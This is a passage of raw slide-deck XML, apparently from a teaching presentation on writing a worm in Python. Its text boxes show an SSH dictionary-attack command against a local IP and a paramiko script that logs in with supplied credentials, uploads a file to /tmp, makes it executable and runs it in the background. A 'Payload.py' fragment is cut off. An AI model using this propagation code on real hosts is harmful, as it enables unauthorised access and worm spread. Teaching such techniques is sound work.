                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1300" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[2])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="6400800"/>
            <a:ext cx="7250703" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SSHDictionaryAttack.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 192.168.1.5 dictionary </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312287215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3400" y="6477000"/>
            <a:ext cx="8458200" cy="304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5715000" y="1676400"/>
            <a:ext cx="3352800" cy="685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Worm in Python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8610600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UploadAndExecute.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>import sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UploadFileAndExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sshConnection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sftpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.open_sftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sftpClient.put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/" +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.exec_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/" +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.exec_command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nohup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/" +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>fileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+ " &amp;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>if __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>__ == "__main__" :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko.SSHClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.set_missing_host_key_policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>paramiko.AutoAddPolicy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[2], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[3])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>UploadFileAndExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sys.argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[4])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ssh.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773328" y="1676400"/>
            <a:ext cx="3370672" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>mport </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Payload.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s.mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>tmp</a:t>
